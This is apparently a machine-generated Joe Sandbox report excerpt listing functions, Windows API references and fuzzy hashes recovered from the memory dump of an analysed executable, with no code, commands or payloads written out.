Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc65b1b2a8023ab9b868c5cda7b3ae7400d104af7aba2b2dfb803ba2cbf1efe7
Instruction ID: 95191ce2222509eb9c564c8964c59d5eca536bdcffacd2f0015990031d6bbaf0
Opcode Fuzzy Hash: bc65b1b2a8023ab9b868c5cda7b3ae7400d104af7aba2b2dfb803ba2cbf1efe7
Instruction Fuzzy Hash: 07516F356043019FCB14EF28D491AAA77E5EF49320F14856DFD9A8B292DB34E849CBB1

Function 00D98065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00D98074
GetForegroundWindow.USER32 ref: 00D9807A

Part of subcall function 00D96B19: GetWindowRect.USER32(?,?), ref: 00D96B2C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$CursorForegroundRect
String ID:
API String ID: 1066937146-0
Opcode ID: f0830896da15583fdfd10f0b24ccc1cfa4835dabfd3021dd072fa91958218df7
Instruction ID: 3f0c084d38c787a0e11d0a75b5e1c4f7bd5d3c82769131ae86c86e37fd3ed18b
Opcode Fuzzy Hash: f0830896da15583fdfd10f0b24ccc1cfa4835dabfd3021dd072fa91958218df7
Instruction Fuzzy Hash: 99311D75900209AFDF00EFA4CC81AAEB7B5FF05714F14446AE946A7251EB34AE49CBB0

Function 00D41DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00DBDB31
IsWindow.USER32(00000000), ref: 00DBDB6B

Part of subcall function 00D41F04: GetForegroundWindow.USER32 ref: 00D41FBE

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Foreground
String ID:
API String ID: 62970417-0
Opcode ID: ee1c78e8616b348e49ba12c898bc7312de66f920aff9f4454cb4f0e01d77b0a2
Instruction ID: d977e53e710c5106f9f5839be678b0f61d498d0c4c14a0ce6671e0ad1a0834d9
Opcode Fuzzy Hash: ee1c78e8616b348e49ba12c898bc7312de66f920aff9f4454cb4f0e01d77b0a2
Instruction Fuzzy Hash: E1218C72600206AFDB11AB74C891FFE76AAEF80788F040429F95AC6141EB70EA45D770

Function 00D7E2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D41952

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D7E344
_strlen.LIBCMT ref: 00D7E34F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID:
API String ID: 2777139624-0
Opcode ID: a5e3a6865eaa616e92b6b8f65b71f777112200a00d4ccc1e3a33839f386857af
Instruction ID: e581090a34899c70e28ed3bc003cf6c39b124d0d5b0fa6ffe23ae190b07dcf01
Opcode Fuzzy Hash: a5e3a6865eaa616e92b6b8f65b71f777112200a00d4ccc1e3a33839f386857af
Instruction Fuzzy Hash: 0011C63120021567CB04BBA9DCC6DBF7BA9DF49344B00847DF60ADB192EE74994697B0

Function 00D43682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

74E4C8D0.UXTHEME ref: 00D436E6

Part of subcall function 00D62025: __lock.LIBCMT ref: 00D6202B

Part of subcall function 00D432DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D432F6
Part of subcall function 00D432DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D4330B

Part of subcall function 00D4374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D4376D
Part of subcall function 00D4374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00D4377F
Part of subcall function 00D4374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_VKKDXE.exe,00000104,?,00E01120,C:\Users\user\Desktop\._cache_VKKDXE.exe,00E01124,?,?), ref: 00D437EE
Part of subcall function 00D4374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00D43860

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00D43726

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
String ID:
API String ID: 3809921791-0
Opcode ID: 560d82e628f7d21f082c3ba2550c8fd8fcd6327533364ad0b4f0c09d5a3899e7
Instruction ID: ef36046f3e91d6cb346f25b5ca8468dec23eb03c8ea0658c74116b84d397bbe4
Opcode Fuzzy Hash: 560d82e628f7d21f082c3ba2550c8fd8fcd6327533364ad0b4f0c09d5a3899e7
Instruction Fuzzy Hash: 6F119D719083429FC710DF2ADC4991ABBE8FF95750F00451EF885972A1EB759988CBB2

Function 00D44B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00D44C2B,?,?,?,?,00D4BE63), ref: 00D44BB6
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00D44C2B,?,?,?,?,00D4BE63), ref: 00DB4972

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0c5e00a81e7b4a0f05475f9439cb7826b7348479dbdaa806d2028b0bb14d812b
Instruction ID: 0fa545bcf3d037e039e052a5bd718753d06713bbb7a188d9fef28ddf65235e7c
Opcode Fuzzy Hash: 0c5e00a81e7b4a0f05475f9439cb7826b7348479dbdaa806d2028b0bb14d812b
Instruction Fuzzy Hash: 28019270244309BFF7244E24CC8AF663BDCEB05768F148319BAE59A1E0C6B09C84CB20

Function 00D5F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F282
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F2A6

Part of subcall function 00D5F2D0: _memmove.LIBCMT ref: 00D5F307

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 96a6160fe4de6bc9dec4ea96691517239386654f8864e4929381aad526842366
Instruction ID: 74a5f09075d51328ed9b955f6001cda96440fbceee40aee0252e8ee7f7cba24b
Opcode Fuzzy Hash: 96a6160fe4de6bc9dec4ea96691517239386654f8864e4929381aad526842366
Instruction Fuzzy Hash: 24F04FB6104214BFAF10AF65DC44CBB7FAEEF8A3617408026FD08CB111DA31DD018675

Function 00D6F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00D6F7D9
__close_nolock.LIBCMT ref: 00D6F7F2

Part of subcall function 00D6886A: __getptd_noexit.LIBCMT ref: 00D6886A

Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: d284710c1b524156febbfad0fcebde4dd6378efca6fe8aad217506a1e92ca815
Instruction ID: 630f64a2c534bdc65227c1277dd113738d0a9fa41f81e0c4163be98bf1e134b3
Opcode Fuzzy Hash: d284710c1b524156febbfad0fcebde4dd6378efca6fe8aad217506a1e92ca815
Instruction Fuzzy Hash: 751182B2805A148FD711BFA8F8423587B90EF41335F9603A0E5656F1E3CBB4998097B1

Function 00D434F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D4352A

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

_wcscat.LIBCMT ref: 00DB66C0

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: 8a918a80b6f5d8d528dfebd1b98fac2ef17f326ee36dbc20a55ddace56523b03
Instruction ID: 1cba9c719bcf813e2a598e6affce161ca7861c904dced4f6feebab98118aa4cd
Opcode Fuzzy Hash: 8a918a80b6f5d8d528dfebd1b98fac2ef17f326ee36dbc20a55ddace56523b03
Instruction Fuzzy Hash: DB01807194410D9BCF10FBA8D846ADD73B9EF24348F4042E5B915E71A0EB30DB858BB1

Function 00D99500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,?,00000000,00000000), ref: 00D99534
WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00D99557

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: aaf7af6763b3589b4f7428c1cfd32c3ee5180b485ecffe293eeb0f7379177be7
Instruction ID: df386fabff9d3a5b86774488d7f5427630ab65e7507749dc9f8cee052ffe23ff
Opcode Fuzzy Hash: aaf7af6763b3589b4f7428c1cfd32c3ee5180b485ecffe293eeb0f7379177be7
Instruction Fuzzy Hash: 44011E352006009FDB10EB28D891F6AB7E9EB99721F15852EEA5A87391DA71EC05CB70

Function 00D64274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E

__lock_file.LIBCMT ref: 00D642B9

Part of subcall function 00D65A9F: __lock.LIBCMT ref: 00D65AC2

__fclose_nolock.LIBCMT ref: 00D642C4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3fe84d551c50a76da535d13f2501b591b6b5b13bba4fb9d58fab4242ec78120d
Instruction ID: 483505c1f41695f26a689e14873f91f496a71aa265715908a94784f25103dba4
Opcode Fuzzy Hash: 3fe84d551c50a76da535d13f2501b591b6b5b13bba4fb9d58fab4242ec78120d
Instruction Fuzzy Hash: B1F0B4318117099BD710BB75880276E6BD0AF45738F358209F8649B1C1CB7CD9819B79

Function 00D5F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00D5F57A

Part of subcall function 00D4E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4E279

Sleep.KERNEL32(00000000), ref: 00DB75D3

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID:
API String ID: 1792118007-0
Opcode ID: d013ae22c79b0bb78cedbda0c218f4b299a02ecb988d2f5532597b1745213c9c
Instruction ID: b93afd65e617f3c96a29c342efff9af7f6c63a66bfa3263584174e7984602dcd
Opcode Fuzzy Hash: d013ae22c79b0bb78cedbda0c218f4b299a02ecb988d2f5532597b1745213c9c
Instruction Fuzzy Hash: 61F058712407169BD354EF69D805B96BBE9EB58321F00002AF95AC7391EB70A8008BB0

Function 00D481C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON

Download Yara Rule

APIs

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

__wcsnicmp.LIBCMT ref: 00D483C4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __itow__swprintf__wcsnicmp
String ID:
API String ID: 712828618-0
Opcode ID: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
Instruction ID: 0c3190d2b0b6c79a6ea2c2fed7b3bc8bd531484cadfde6d44b9019ec2e5b6d76
Opcode Fuzzy Hash: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
Instruction Fuzzy Hash: FEF15C75508302EFC705DF18C89186EBBE6FF99344F54491DF98A97221EB30E909DB62

Function 00D54040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
Instruction ID: 5516a484e4de362f57c7f25595836152ae5a15e75c50c20e27ef5ff3181d3921
Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
Instruction Fuzzy Hash: 36619074A046069FCB00DF58C880E7AB7E5FF59315F148269ED1687291EB30ED99CBB2

Function 00D5EF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8589780dee01c0e742f75da6297eed7daf8cb4a07677d73e099e55c39d0674d
Instruction ID: 4d81d735f850c5ae00dee6882c6af90c9fb3a50174fff49419a0b5ef3eb85057
Opcode Fuzzy Hash: e8589780dee01c0e742f75da6297eed7daf8cb4a07677d73e099e55c39d0674d
Instruction Fuzzy Hash: CF518135600214EFCF14EF68C991EAE77A6EF49710B188069F94A9B392DB34ED05DB70

Function 00D4B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D4B7C2

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove
